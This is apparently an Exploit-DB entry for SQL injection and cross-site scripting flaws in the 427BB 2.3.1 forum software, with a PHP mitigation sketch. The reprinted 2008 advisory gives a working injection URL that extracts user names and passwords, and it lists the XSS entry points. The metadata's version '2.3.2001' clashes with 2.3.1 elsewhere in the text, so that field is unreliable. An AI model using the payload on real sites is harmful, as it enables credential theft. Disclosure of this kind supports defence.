Vendor: 427BB
By: CWH Underground
CVSS: 8.8 (HIGH)
SQL Injection and XSS
CWE: 89 (SQL Injection) and 79 (XSS)
Product Name: 427BB
Affected Version From: 2.3.2001
Affected Version To: 2.3.2001
Patch Exists: NO
CPE: 427bb:427bb:2.3.1
2008

427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities

A SQL injection vulnerability exists in showpost.php due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's database. Multiple XSS vulnerabilities exist in register.php, reminder.php, and search.php due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to inject arbitrary HTML and script code into the application's web pages.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks. All user-supplied input should be validated and filtered before being used in SQL queries or HTML output.
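
As an added illustration of this mitigation (not 427BB code and not part of the original advisory), the sketch below validates and binds a post ID instead of concatenating it into the query, and HTML-encodes a reflected form field. The helper names `fetch_post` and `h`, the `bb_` prefix, the trimmed table layout and the in-memory SQLite database are assumptions made so the example runs on its own.

```php
<?php
// Added example, not 427BB code; helper names and the trimmed table layout are assumptions.

// Constructed stand-in for the forum database (in-memory SQLite through PDO).
$t_prefix = 'bb_'; // comes from configuration, never from the request
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE {$t_prefix}Posts (ID INTEGER PRIMARY KEY, UserName TEXT, Post TEXT)");
$pdo->exec("INSERT INTO {$t_prefix}Posts VALUES (1, 'alice', 'first post')");

// Hypothetical helper: fetch one post by ID without concatenating the value into SQL.
function fetch_post(PDO $pdo, string $t_prefix, $raw_id): ?array
{
    // Validate: a post ID is a positive integer and nothing else.
    $post_id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($post_id === false) {
        return null; // reject rather than attempt to clean the value
    }
    // Bind: the value is sent as a typed parameter, separate from the SQL text.
    $stmt = $pdo->prepare("SELECT ID, UserName, Post FROM {$t_prefix}Posts WHERE ID = :id");
    $stmt->bindValue(':id', $post_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical helper: encode a value for HTML text or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request values standing in for $_GET['post'].
$samples = ['1', '1 union select 1', '-5', ''];
foreach ($samples as $raw) {
    $row = fetch_post($pdo, $t_prefix, $raw);
    $outcome = $row === null ? 'rejected or not found' : 'post by ' . h($row['UserName']);
    echo var_export($raw, true), ' => ', $outcome, "\n";
}

// Constructed value standing in for $_POST['keywords'] echoed back into the form.
$keywords = '"><i>markup</i>';
echo '<input name="keywords" value="', h($keywords), '">', "\n";
```

The same `h()` call applies wherever the request path or the POST fields listed in the advisory are echoed back into a page.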
Source

Exploit-DB raw data:

============================================================
 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities
============================================================


AUTHOR : CWH Underground
DATE   : 4 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : 427BB
 VERSION     : 2.3.1
 DOWNLOAD    : http://fourtwosevenbb.sourceforge.net/
#####################################################

---SQL Injection Exploit [showpost.php]---

##############################################
Vulnerable: showpost.php

118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
119:
120: $res = mysql_query($sql);

###############################################

Exploit:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--



---Multiple Remote XSS Exploit---

###########
XSS in URI
###########

Example:
     
http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>

####################
XSS with POST Method
####################

Example:

http://[target]/[path]/register.php
[-]POST variable "uname"
[-]POST variable "email"
[-]POST variable "email2"

http://[target]/[path]/reminder.php
[-]POST variable "email"

http://[target]/[path]/search.php
[-]POST variable "keywords"

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-05]